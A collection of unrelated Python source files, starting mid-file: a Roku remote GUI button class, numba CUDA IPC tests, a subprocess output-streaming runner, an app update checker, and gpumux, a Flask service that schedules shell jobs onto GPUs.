            ipadx=PADDING_X,
            ipady=PADDING_Y,
        )
        self.shape(1, 2)

    def pressed(self):
        """Dispatch this button's key press to the selected device."""
        device = self.master.state.selected
        if device:
            # Bug fix: only enqueue when the press is actually dispatched.
            # Previously the action was enqueued even with no device
            # selected, leaving a stale item in the shared queue that a
            # *different* button's get() would later dequeue and send.
            self.master._button_pressed_queue.put(self.action)
            thread = Thread(
                target=device.key_press,
                args=(self.master._button_pressed_queue.get(),),
                daemon=True,
            )
            thread.start()
            print(f"pressed {self.action}")
        else:
            print("Please select a device.")


class RokuApplicationButton(RokuButton):
    """Button that launches an installed application (channel) on the device."""

    def __init__(self, root, app, *args, **kwargs):
        super().__init__(root, *args, **kwargs)
        self.app = app
        self.configure(
            height=BUTTON_HEIGHT + 1,
            text=app,
            command=self.pressed,
        )
        self.grid(
            sticky="nsew",
            padx=MARGIN,
            pady=MARGIN,
            ipadx=PADDING_X,
            ipady=PADDING_Y,
        )
        self.shape(1, 6)

    def pressed(self):
        """Launch this button's application on the selected device."""
        device = self.master.state.selected
        if device:
            # Same fix as RokuActionButton.pressed: enqueue only when the
            # press can actually be dispatched to a device.
            self.master._button_pressed_queue.put(self.app)
            thread = Thread(
                target=device[self.master._button_pressed_queue.get()].launch,
                daemon=True,
            )
            thread.start()
            print(f"Pressed {self.app}")
        else:
            print("Please select a device.")
test_ipc.py
"""Tests for CUDA IPC memory handles shared across processes."""
from __future__ import absolute_import, print_function, division

import sys
import multiprocessing as mp
import traceback
import pickle

import numpy as np
from numba import cuda
from numba.cuda.cudadrv import drvapi, devicearray
from numba import unittest_support as unittest
from numba.cuda.testing import skip_on_cudasim, CUDATestCase

# CUDA IPC is only supported on Linux.
not_linux = not sys.platform.startswith('linux')
# The 'spawn' start-method used below needs multiprocessing.get_context.
has_mp_get_context = hasattr(mp, 'get_context')


def core_ipc_handle_test(the_work, result_queue):
    # Run `the_work` and put (success_flag, ndarray_or_traceback) on the
    # queue so the parent process can assert on the result.
    try:
        arr = the_work()
    except:
        # FAILED. propagate the exception as a string
        succ = False
        out = traceback.format_exc()
    else:
        # OK. send the ndarray back
        succ = True
        out = arr
    result_queue.put((succ, out))


def base_ipc_handle_test(handle, size, result_queue):
    # Child-process body: reopen a raw IPC handle and copy its data to host.
    def the_work():
        dtype = np.dtype(np.intp)
        with cuda.open_ipc_array(handle, shape=size // dtype.itemsize,
                                 dtype=dtype) as darr:
            # copy the data to host
            return darr.copy_to_host()

    core_ipc_handle_test(the_work, result_queue)


def serialize_ipc_handle_test(handle, result_queue):
    # Child-process body: open an unpickled IpcHandle and copy data to host.
    def the_work():
        dtype = np.dtype(np.intp)
        darr = handle.open_array(cuda.current_context(),
                                 shape=handle.size // dtype.itemsize,
                                 dtype=dtype)
        # copy the data to host
        arr = darr.copy_to_host()
        handle.close()
        return arr

    core_ipc_handle_test(the_work, result_queue)


def ipc_array_test(ipcarr, result_queue):
    # Child-process body: open an IPC array, read it, and verify that
    # reopening an already-open handle raises ValueError.
    try:
        with ipcarr as darr:
            arr = darr.copy_to_host()
            try:
                # should fail to reopen
                with ipcarr:
                    pass
            except ValueError as e:
                if str(e) != 'IpcHandle is already opened':
                    raise AssertionError('invalid exception message')
            else:
                raise AssertionError('did not raise on reopen')
    except:
        # FAILED. propagate the exception as a string
        succ = False
        out = traceback.format_exc()
    else:
        # OK. send the ndarray back
        succ = True
        out = arr
    result_queue.put((succ, out))


@unittest.skipIf(not_linux, "IPC only supported on Linux")
@unittest.skipUnless(has_mp_get_context,
                     "requires multiprocessing.get_context")
@skip_on_cudasim('Ipc not available in CUDASIM')
class TestIpcMemory(CUDATestCase):
    """IPC handles opened from a spawned child process."""

    def test_ipc_handle(self):
        # prepare data for IPC
        arr = np.arange(10, dtype=np.intp)
        devarr = cuda.to_device(arr)

        # create IPC handle
        ctx = cuda.current_context()
        ipch = ctx.get_ipc_handle(devarr.gpu_data)

        # manually prepare for serialization as bytes
        handle_bytes = bytes(ipch.handle)
        size = ipch.size

        # spawn new process for testing
        ctx = mp.get_context('spawn')
        result_queue = ctx.Queue()
        args = (handle_bytes, size, result_queue)
        proc = ctx.Process(target=base_ipc_handle_test, args=args)
        proc.start()
        succ, out = result_queue.get()
        if not succ:
            self.fail(out)
        else:
            np.testing.assert_equal(arr, out)
        proc.join(3)

    def test_ipc_handle_serialization(self):
        # prepare data for IPC
        arr = np.arange(10, dtype=np.intp)
        devarr = cuda.to_device(arr)

        # create IPC handle
        ctx = cuda.current_context()
        ipch = ctx.get_ipc_handle(devarr.gpu_data)

        # pickle
        buf = pickle.dumps(ipch)
        ipch_recon = pickle.loads(buf)
        self.assertIs(ipch_recon.base, None)
        self.assertEqual(tuple(ipch_recon.handle), tuple(ipch.handle))
        self.assertEqual(ipch_recon.size, ipch.size)

        # spawn new process for testing
        ctx = mp.get_context('spawn')
        result_queue = ctx.Queue()
        args = (ipch, result_queue)
        proc = ctx.Process(target=serialize_ipc_handle_test, args=args)
        proc.start()
        succ, out = result_queue.get()
        if not succ:
            self.fail(out)
        else:
            np.testing.assert_equal(arr, out)
        proc.join(3)

    def test_ipc_array(self):
        # prepare data for IPC
        arr = np.arange(10, dtype=np.intp)
        devarr = cuda.to_device(arr)
        ipch = devarr.get_ipc_handle()

        # spawn new process for testing
        ctx = mp.get_context('spawn')
        result_queue = ctx.Queue()
        args = (ipch, result_queue)
        proc = ctx.Process(target=ipc_array_test, args=args)
        proc.start()
        succ, out = result_queue.get()
        if not succ:
            self.fail(out)
        else:
            np.testing.assert_equal(arr, out)
        proc.join(3)


@unittest.skipUnless(not_linux, "Only on OS other than Linux")
@skip_on_cudasim('Ipc not available in CUDASIM')
class TestIpcNotSupported(CUDATestCase):
    """On non-Linux platforms, requesting an IPC handle must fail cleanly."""

    def test_unsupported(self):
        arr = np.arange(10, dtype=np.intp)
        devarr = cuda.to_device(arr)
        with self.assertRaises(OSError) as raises:
            devarr.get_ipc_handle()
        errmsg = str(raises.exception)
        self.assertIn('OS does not support CUDA IPC', errmsg)


def staged_ipc_handle_test(handle, device_num, result_queue):
    # Child-process body: open a staged IPC handle on a specific device and
    # copy the device memory back to host.
    def the_work():
        with cuda.gpus[device_num]:
            this_ctx = cuda.devices.get_context()
            can_access = handle.can_access_peer(this_ctx)
            print('can_access_peer {} {}'.format(this_ctx, can_access))
            deviceptr = handle.open_staged(this_ctx)
            arrsize = handle.size // np.dtype(np.intp).itemsize
            hostarray = np.zeros(arrsize, dtype=np.intp)
            cuda.driver.device_to_host(
                hostarray, deviceptr, size=handle.size,
            )
            handle.close()
        return hostarray

    core_ipc_handle_test(the_work, result_queue)


def staged_ipc_array_test(ipcarr, device_num, result_queue):
    # Child-process body: same as ipc_array_test but bound to a specific
    # device via cuda.gpus[device_num].
    try:
        with cuda.gpus[device_num]:
            this_ctx = cuda.devices.get_context()
            print(this_ctx.device)
            with ipcarr as darr:
                arr = darr.copy_to_host()
                try:
                    # should fail to reopen
                    with ipcarr:
                        pass
                except ValueError as e:
                    if str(e) != 'IpcHandle is already opened':
                        raise AssertionError('invalid exception message')
                else:
                    raise AssertionError('did not raise on reopen')
    except:
        # FAILED. propagate the exception as a string
        succ = False
        out = traceback.format_exc()
    else:
        # OK. send the ndarray back
        succ = True
        out = arr
    result_queue.put((succ, out))


@unittest.skipIf(not_linux, "IPC only supported on Linux")
@unittest.skipUnless(has_mp_get_context,
                     "requires multiprocessing.get_context")
@skip_on_cudasim('Ipc not available in CUDASIM')
class TestIpcStaged(CUDATestCase):
    """Staged IPC handles exercised across all available CUDA devices."""

    def test_staged(self):
        # prepare data for IPC
        arr = np.arange(10, dtype=np.intp)
        devarr = cuda.to_device(arr)

        # spawn new process for testing
        mpctx = mp.get_context('spawn')
        result_queue = mpctx.Queue()

        # create IPC handle
        ctx = cuda.current_context()
        ipch = ctx.get_ipc_handle(devarr.gpu_data)

        # pickle
        buf = pickle.dumps(ipch)
        ipch_recon = pickle.loads(buf)
        self.assertIs(ipch_recon.base, None)
        self.assertEqual(tuple(ipch_recon.handle), tuple(ipch.handle))
        self.assertEqual(ipch_recon.size, ipch.size)

        # Test on every CUDA devices
        for device_num in range(len(cuda.gpus)):
            args = (ipch, device_num, result_queue)
            proc = mpctx.Process(target=staged_ipc_handle_test, args=args)
            proc.start()
            succ, out = result_queue.get()
            proc.join(3)
            if not succ:
                self.fail(out)
            else:
                np.testing.assert_equal(arr, out)

    def test_ipc_array(self):
        for device_num in range(len(cuda.gpus)):
            # prepare data for IPC
            arr = np.random.random(10)
            devarr = cuda.to_device(arr)
            ipch = devarr.get_ipc_handle()

            # spawn new process for testing
            ctx = mp.get_context('spawn')
            result_queue = ctx.Queue()
            args = (ipch, device_num, result_queue)
            proc = ctx.Process(target=staged_ipc_array_test, args=args)
            proc.start()
            succ, out = result_queue.get()
            proc.join(3)
            if not succ:
                self.fail(out)
            else:
                np.testing.assert_equal(arr, out)


if __name__ == '__main__':
    unittest.main()
SubprocessRunner.py
# Copyright 2016 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Run a subprocess, streaming its stdout/stderr to callbacks on reader threads."""

import subprocess
import os
import fcntl
import time
import select
import threading
import logging
import traceback

# Compatibility shim: the module historically targeted Python 2 (`Queue`);
# fall back to the Python 3 name while keeping the old alias.
try:
    import Queue
except ImportError:
    import queue as Queue

# Serializes pipe/thread setup across concurrently started runners.
setupLock = threading.Lock()


class SubprocessRunner(object):
    """Spawn a subprocess and forward its output streams to callbacks.

    Two daemon-less reader threads pump the child's stdout and stderr into
    `onStdOut` / `onStdErr`.  With `enablePartialLineOutput` the pipes are
    made non-blocking and raw chunks (up to `pipeReadBufferSize` bytes) are
    delivered; otherwise callbacks receive one rstripped line per call.
    """

    def __init__(self, subprocessArguments, onStdOut, onStdErr, env=None,
                 enablePartialLineOutput=False):
        # Callbacks invoked (on the reader threads) with output text.
        self.onStdOut = onStdOut
        self.onStdErr = onStdErr
        # argv list handed to subprocess.Popen.
        self.subprocessArguments = subprocessArguments
        self.env = env
        self.enablePartialLineOutput = enablePartialLineOutput
        self.pipeReadBufferSize = 1024
        self.onDisconnected = None
        self.subprocessOutThread = None
        # Flag checked by the reader loops to know when to exit.
        self.isShuttingDown = False
        self.process = None
        self.isStarted = False
        self.messagePumpThread = None
        self.messagePumpQueue = Queue.Queue()
        self.subprocessStdIn = None
        self.subprocessStdOut = None
        self.subprocessStdErr = None
        self.subprocessOutputThread = None

    def start(self):
        """Create the pipes, start the reader threads, and launch the child.

        Returns self to allow chaining like ``runner.start().wait(...)``.
        """
        with setupLock:
            assert (self.subprocessOutThread is None or
                    not self.subprocessOutThread.is_alive())

            stdInRead, stdInWrite = os.pipe()
            stdOutRead, stdOutWrite = os.pipe()
            stdErrRead, stdErrWrite = os.pipe()

            self.subprocessStdIn = os.fdopen(stdInWrite, 'w', 1)
            self.subprocessStdOut = os.fdopen(stdOutRead, 'r', 1)
            self.subprocessStdErr = os.fdopen(stdErrRead, 'r', 1)

            if self.enablePartialLineOutput:
                # enable non-blocking reads
                fcntl.fcntl(self.subprocessStdOut, fcntl.F_SETFL, os.O_NONBLOCK)
                fcntl.fcntl(self.subprocessStdErr, fcntl.F_SETFL, os.O_NONBLOCK)

            self.subprocessStdInFileDescriptor = stdInWrite
            self.subprocessStdOutFileDescriptor = stdOutRead
            self.subprocessStdErrFileDescriptor = stdErrRead

            # Write ends of the child's output pipes are kept open in this
            # process so stop() can unblock the reader threads with a "\n".
            self.subprocessStdOutFromOtherSide = os.fdopen(stdOutWrite, 'w', 1)
            self.subprocessStdErrFromOtherSide = os.fdopen(stdErrWrite, 'w', 1)

            # start our reading threads BEFORE we open the process
            self.subprocessOutThread = threading.Thread(
                target=self.processOutputLoop,
                args=('stdOut', self.subprocessStdOut, self.onStdOut)
                )
            self.subprocessOutThread.start()

            self.subprocessErrThread = threading.Thread(
                target=self.processOutputLoop,
                args=('stdErr', self.subprocessStdErr, self.onStdErr)
                )
            self.subprocessErrThread.start()

            logging.debug(
                "SubprocessRunner subprocess.Popen call starting "
                "with arguments %s",
                self.subprocessArguments
                )

            # Popen is run on a helper thread so a wedged fork can't hang
            # the caller forever; we give it 10 seconds to come up.
            subprocessEvent = threading.Event()

            def startSubprocess():
                self.process = subprocess.Popen(
                    self.subprocessArguments,
                    stdin=stdInRead,
                    stdout=stdOutWrite,
                    stderr=stdErrWrite,
                    env=self.env
                    )
                subprocessEvent.set()

            startSubprocessThread = threading.Thread(target=startSubprocess)
            startSubprocessThread.start()

            subprocessEvent.wait(10.0)
            assert subprocessEvent.is_set(), \
                "Failed to start the subprocess process."

            os.close(stdInRead)
            self.isStarted = True

            # return self to allow chaining like: runner.start().wait(...)
            return self

    @property
    def pid(self):
        """The child's process id, or None if not started."""
        if self.process is None:
            return None
        return self.process.pid

    def __str__(self):
        return "Subprocess(isStarted=%s, args=%s)" % (
            self.isStarted, self.subprocessArguments)

    def write(self, content):
        """Write `content` to the child's stdin. Requires start() first."""
        assert self.isStarted, "Process is not started."
        self.subprocessStdIn.write(content)

    def flush(self):
        """Flush the child's stdin pipe."""
        self.subprocessStdIn.flush()

    def stop(self):
        """Kill the child (if alive), then shut down the reader threads."""
        try:
            if self.process:
                # disconnect the subprocess
                try:
                    result = self.process.poll()
                    if result is None:
                        self.process.kill()
                except OSError:
                    pass

                self.process.wait()
                logging.debug("Subprocess has shut down successfully")

                self.isShuttingDown = True

                # Wake each reader thread with a newline so its blocking
                # read returns, then join it.  Skip the join when stop()
                # is (unusually) called from that same thread.
                if (self.subprocessOutThread is not None and
                        not self.isSuprocessOutThread()):
                    self.subprocessStdOutFromOtherSide.write("\n")
                    self.subprocessOutThread.join()
                    self.subprocessStdOutFromOtherSide.close()

                if (self.subprocessErrThread is not None and
                        not self.isSuprocessErrThread()):
                    self.subprocessStdErrFromOtherSide.write("\n")
                    self.subprocessErrThread.join()
                    self.subprocessStdErrFromOtherSide.close()

                self.subprocessStdIn.close()
                logging.debug("SubprocessRunner has shut down successfully")
        finally:
            self.isShuttingDown = False

    def terminate(self):
        """Send SIGTERM to the child."""
        assert self.isStarted
        self.process.terminate()

    def kill(self):
        """Send SIGKILL to the child."""
        assert self.isStarted
        self.process.kill()

    def poll(self):
        """Return the child's exit code, or None if it is still running."""
        return self.process.poll()

    def wait(self, timeout=None, interval=.1):
        """Wait for the child to exit; returns its exit code (None on timeout)."""
        if timeout is None:
            return self.process.wait()

        toStopTime = time.time() + timeout
        while self.process.poll() is None and time.time() < toStopTime:
            time.sleep(interval)

        return self.process.poll()

    def isSuprocessOutThread(self):
        """True when called from the stdout reader thread."""
        return (threading.current_thread().ident ==
                self.subprocessOutThread.ident)

    def isSuprocessErrThread(self):
        """True when called from the stderr reader thread."""
        # Bug fix: this previously compared against subprocessOutThread's
        # ident (copy-paste error), so the stderr reader thread was never
        # recognized as such.
        return (threading.current_thread().ident ==
                self.subprocessErrThread.ident)

    def processOutputLoop(self, description, outputFile, onDataCallback):
        """Reader-thread body: pump `outputFile` into `onDataCallback`.

        Runs until isShuttingDown is set; the file is closed on exit.
        """
        try:
            while not self.isShuttingDown:
                if self.enablePartialLineOutput:
                    # Wait for readability, then deliver a raw chunk.
                    readyFiles = select.select([outputFile], [], [])[0]
                    if len(readyFiles):
                        message = readyFiles[0].read(self.pipeReadBufferSize)
                else:
                    # Line mode: blocks until a full line is available.
                    message = outputFile.readline().rstrip()

                try:
                    if not self.isShuttingDown:
                        onDataCallback(message)
                except:
                    logging.error("%s threw exception: %s",
                                  onDataCallback.__name__,
                                  traceback.format_exc())
        finally:
            logging.debug("SubprocessRunner closing %s to subprocess",
                          description)
            outputFile.close()
Update.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""Periodic application-update check: decides when to query the update
server and hands the result to the update-info view."""

import threading
import time

from Da import AppBase
from Da import Config
from Da import Updater
from View import UpdateInfoView

# Seconds between update checks, keyed by the user's configured 'udrate'.
_CHECK_INTERVALS = {
    1: 86400,        # daily
    2: 86400 * 7,    # weekly
    3: 86400 * 30,   # monthly
}
# Unrecognized 'udrate' values fall back to a weekly check.
_DEFAULT_INTERVAL = 86400 * 7


class Update:
    """Coordinates the update check and the update-info UI."""

    def __init__(self):
        self.app = AppBase.info
        self.Updater = Updater.Updater()
        self.Cfg = Config.Config()
        self.UdView = UpdateInfoView.GUI()

    def chkUpdate(self, force=False):
        """Run an update check if the configured interval has elapsed.

        Args:
            force: when truthy, skip the interval test and always check.
        """
        cfgInfo = self.Cfg.get()
        now = int(time.time())
        if force:
            # Forced check: treat the next check as already due.
            updateTime = 0
        else:
            interval = _CHECK_INTERVALS.get(cfgInfo['udrate'], _DEFAULT_INTERVAL)
            updateTime = int(cfgInfo['udtime']) + interval
        if updateTime < now:
            self.UdView.show()
            # Query the update server off the UI thread; the view polls for
            # the result via updateInfo().
            threading.Thread(target=self.__check).start()
            self.UdView.updateInfo()

    def __check(self):
        """Background worker: fetch update info and record the check time."""
        now = int(time.time())
        info = self.Updater.check(self.app['build'])
        self.Cfg.save({'udtime': now})
        self.UdView.udInfo = info
gpumux.py
#!/usr/bin/env python3

# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""gpumux: a small flask service that multiplexes shell jobs onto GPUs.

Jobs are queued one-per-line in a text file, launched one-per-GPU inside
GNU screen sessions, and tracked through "<id>.<ext>" state files in the
running/ and completed/ subdirectories of the log directory.
"""

import argparse
import collections
import glob
import os
import re
import shutil
import socket
import subprocess
import threading
import time

import flask

# Matches one line of `nvidia-smi --list-gpus`, e.g. "GPU 0: Tesla V100 ...".
# NOTE(review): not a raw string - '\s'/'\d' are invalid escape sequences and
# warn on newer Pythons; should be r'GPU\s+...'.
R_GPU = re.compile('GPU\s+(?P<id>\d+):\s+(?P<model>.+)')

parser = argparse.ArgumentParser()
parser.add_argument('-p', '--port', help='Port to use for this service.', type=int, default=3390)
parser.add_argument('--gpus', help='List of GPUs to use (inclusive).', type=str, default='0-255')
parser.add_argument('--logdir', help='Directory to store logs.', type=str, default='gpumux')
parser.add_argument('--path', help='Folder where to run jobs..', type=str, default='.')
parser.add_argument('--py', help='Path to custom python interpreter.', type=str, default='')
args = parser.parse_args()

PATH = os.path.abspath(args.path)
# Queue file: one shell command per line.
PENDING_JOBS = os.path.join(PATH, args.logdir, 'pending_jobs.txt')
RUNNING_PATH = os.path.join(PATH, args.logdir, 'running')
COMPLETED_PATH = os.path.join(PATH, args.logdir, 'completed')
# screenrc template; %d is the job id, so screen logs to "<id>.log".
SCREEN_RC = 'logfile %d.log\n'
# Per-job wrapper script: pin the GPU, run the command from PATH, then write
# the exit status into "<id>.status" (its presence marks the job completed).
BASH_CMD = """#!/bin/bash
pushd """ + PATH + """
CUDA_VISIBLE_DEVICES=%(gpu)s PYTHONPATH=. """ + args.py + """ ./%(cmd)s
status=$?
popd
echo $status > %(status)s
"""


def apply_gpu_preferences(detected):
    """Drop GPUs whose id falls outside the inclusive --gpus range."""
    gmin, gmax = map(int, args.gpus.split('-'))
    to_del = [x for x in detected.keys() if x < gmin or x > gmax]
    while to_del:
        del detected[to_del.pop()]
    return detected


def get_gpus():
    """Return {gpu_id: model_name} parsed from `nvidia-smi --list-gpus`."""
    cmd_outut = subprocess.check_output(['nvidia-smi', '--list-gpus']).decode()
    gpus = collections.OrderedDict()
    for x in cmd_outut.split('\n'):
        if not x:
            continue
        expr = R_GPU.match(x)
        gpus[int(expr.group('id'))] = expr.group('model')
    gpus = apply_gpu_preferences(gpus)
    print('GPUs available %d' % len(gpus))
    for k, v in gpus.items():
        print('%-2d %s' % (k, v))
    return gpus


class MyFlask(flask.Flask):
    """Flask app with non-default jinja delimiters, so template files can
    contain literal {{ }} / {% %} (e.g. for client-side templating)."""
    jinja_options = flask.Flask.jinja_options.copy()
    jinja_options.update(dict(block_start_string='<%',
                              block_end_string='%>',
                              variable_start_string='${',
                              variable_end_string='}',
                              comment_start_string='<#',
                              comment_end_string='#>',
                              ))


class Jobs:
    """Holds the pending/running/completed job lists, backed by the log dir."""

    # How to parse the contents of each "<id>.<key>" state file.
    CAST = dict(gpu=int, status=int, cmd=str)

    def __init__(self):
        self.pending = [x for x in open(PENDING_JOBS, 'r').read().split('\n') if x]
        self.running = self.parse_jobs(RUNNING_PATH)
        self.completed = self.parse_jobs(COMPLETED_PATH)
        # Replacement texts for the pending file, pushed by the
        # /queue/update.json handler and consumed by refresh().
        self.pending_update = []

    def refresh(self):
        """One scheduler tick: sync state with disk and launch what fits."""
        # Apply the most recently queued rewrite of the pending file (pop()
        # takes the last element) and discard any older queued rewrites.
        if self.pending_update:
            open(PENDING_JOBS, 'w').write(self.pending_update.pop())
        while self.pending_update:
            self.pending_update.pop()
        self.pending = [x for x in open(PENDING_JOBS, 'r').read().split('\n') if x]
        self.running = self.parse_jobs(RUNNING_PATH)
        # A non-None status means the wrapper script finished; move the job's
        # files into completed/ and re-read that folder.
        to_complete = [x for x in self.running if x.status is not None]
        if to_complete:
            self.running = [x for x in self.running if x not in to_complete]
            for x in to_complete:
                x.complete()
            self.completed = self.parse_jobs(COMPLETED_PATH)
        update_pending_file = False
        while self.schedule():
            update_pending_file = True
        if update_pending_file:
            open(PENDING_JOBS, 'w').write('\n'.join(self.pending))

    def schedule(self):
        """Start the oldest pending job on a free GPU.

        Returns True if a job was launched (refresh() loops until False).
        """
        if not self.pending:
            return False
        gpu_used = set([x.gpu for x in self.running])
        gpu_all = set(GPUS.keys())
        gpu_free = gpu_all - gpu_used
        if not gpu_free:
            return False
        gpu = list(gpu_free)[0]
        # New job id = highest existing id + 1; ids are never reused.
        # NOTE(review): 'id' shadows the builtin.
        id = 0
        if self.running or self.completed:
            id = max(x.id for x in self.running + self.completed)
        id += 1
        cmd = self.pending.pop(0)
        # gpu is set and status is None, so the Job constructor spawns it.
        j = Job(id, gpu, cmd, None)
        self.running.append(j)
        return True

    @classmethod
    def parse_jobs(cls, folder):
        """Rebuild Job objects from the "<id>.<ext>" state files in folder."""
        logs = set(
            map(os.path.basename, glob.glob(os.path.join(folder, '*.*'))))
        ids = sorted(set(int(x.split('.')[0]) for x in logs))
        jobs = []
        for x in ids:
            # Missing state files yield None for that field.
            params = {}
            for key, cast in cls.CAST.items():
                params[key] = None
                if str(x) + '.' + key in logs:
                    params[key] = cast(
                        open(os.path.join(folder, str(x) + '.' + key), 'r').read())
            jobs.append(Job(x, **params))
        return jobs


class Job:
    """A single job, identified by an integer id and backed by state files."""

    def __init__(self, id, gpu, cmd, status):
        self.id = id
        self.gpu = gpu
        self.cmd = cmd
        # Exit status of the wrapper script; None while still running.
        self.status = status
        if gpu is not None and status is None and not self.is_running():
            # Jobs that were interrupted by a reboot or some other action.
            self.spawn()
        self.running_time = self.compute_running_time()

    @property
    def screen_id(self):
        """Name of the GNU screen session hosting this job."""
        return 'gpumux_%d' % self.id

    @property
    def json(self):
        """JSON-serializable summary used by the /status.json endpoint."""
        return dict(id=self.id, gpu=self.gpu, cmd=self.cmd, status=self.status,
                    time=self.running_time)

    def is_running(self):
        """True if a screen session named after this job currently exists."""
        if self.id is None:
            return False
        screens = subprocess.run(['screen', '-ls'], stdout=subprocess.PIPE)
        return self.screen_id in screens.stdout.decode()

    def compute_running_time(self):
        """Elapsed seconds: start-to-now if running, start-to-finish if done.

        Uses the mtime of "<id>.gpu" as the start time and of "<id>.status"
        as the finish time.
        """
        if not os.path.exists(os.path.join(RUNNING_PATH, '%d.gpu' % self.id)):
            path = COMPLETED_PATH
        else:
            path = RUNNING_PATH
        start_time = os.path.getmtime(os.path.join(path, '%d.gpu' % self.id))
        if path == RUNNING_PATH:
            return round(time.time() - start_time)
        end_time = os.path.getmtime(os.path.join(path, '%d.status' % self.id))
        return round(end_time - start_time)

    def spawn(self):
        """Write this job's state files and launch it in a screen session."""
        assert self.status is None
        bash_cmd = BASH_CMD % dict(cmd=self.cmd, gpu=self.gpu,
                                   status='%d.status' % self.id)
        open(os.path.join(RUNNING_PATH, '%d.gpu' % self.id), 'w').write(
            str(self.gpu) + '\n')
        open(os.path.join(RUNNING_PATH, '%d.cmd' % self.id), 'w').write(
            str(self.cmd) + '\n')
        open(os.path.join(RUNNING_PATH, '%d.sh' % self.id), 'w').write(bash_cmd)
        open(os.path.join(RUNNING_PATH, '%d.screenrc' % self.id), 'w').write(
            SCREEN_RC % self.id)
        # The wrapper script must be executable for screen to run it.
        os.chmod(os.path.join(RUNNING_PATH, '%d.sh' % self.id), 0o700)
        # -dm: detached; -L: enable logging; -c: use our per-job screenrc.
        popen = subprocess.Popen(['screen', '-dm', '-L', '-S', self.screen_id,
                                  '-c', '%d.screenrc' % self.id,
                                  './%d.sh' % self.id],
                                 cwd=RUNNING_PATH)
        status = popen.wait()
        assert status == 0

    def complete(self):
        """Move all of this job's files from running/ to completed/."""
        assert self.status is not None
        files = glob.glob(os.path.join(RUNNING_PATH, '%d.*' % self.id))
        for x in files:
            shutil.move(x, os.path.join(COMPLETED_PATH, os.path.basename(x)))


HOST = socket.gethostname()
GPUS = get_gpus()
app = MyFlask(__name__)


@app.route('/')
def home():
    """Dashboard page."""
    return flask.render_template('home.html', host=HOST, path=PATH,
                                 gpus=len(GPUS), python=args.py or 'default')


@app.route('/status.json')
def status():
    """Current scheduler state, polled by the dashboard."""
    return flask.jsonify(job_thread=JOB_THREAD.is_alive(),
                         completed_jobs=[x.json for x in JOBS.completed][::-1],
                         running_jobs=[x.json for x in JOBS.running],
                         pending_jobs='\n'.join(JOBS.pending))


@app.route('/queue/update.json', methods=['POST'])
def queue_update():
    """Queue a full replacement of the pending-jobs file; refresh() applies it."""
    pending = flask.request.json['pending']
    JOBS.pending_update.append(pending)
    return flask.jsonify(pending=pending)


@app.route('/job/<job_id>')
def job_log(job_id):
    """Serve a job's screen log as plain text, wherever it currently lives."""
    if os.path.exists(os.path.join(RUNNING_PATH, '%s.log' % job_id)):
        fn = os.path.join(RUNNING_PATH, '%s.log' % job_id)
    elif os.path.exists(os.path.join(COMPLETED_PATH, '%s.log' % job_id)):
        fn = os.path.join(COMPLETED_PATH, '%s.log' % job_id)
    else:
        flask.abort(404)
    return flask.Response(open(fn, 'r').read(), mimetype='text/plain')


def job_thread():
    """Background scheduler loop: refresh job state once per second."""
    print('Starting jobs manager.')
    while True:
        JOBS.refresh()
        time.sleep(1)


# Module-level setup: ensure the log directories and pending file exist, then
# build the global job state used by the flask handlers above.
print(RUNNING_PATH)
os.makedirs(RUNNING_PATH, exist_ok=True)
os.makedirs(COMPLETED_PATH, exist_ok=True)
if not os.path.exists(PENDING_JOBS):
    open(PENDING_JOBS, 'w').write('')
JOBS = Jobs()
JOB_THREAD = threading.Thread(target=job_thread)


def main():
    JOB_THREAD.start()
    app.run(port=args.port)


if __name__ == '__main__':
    main()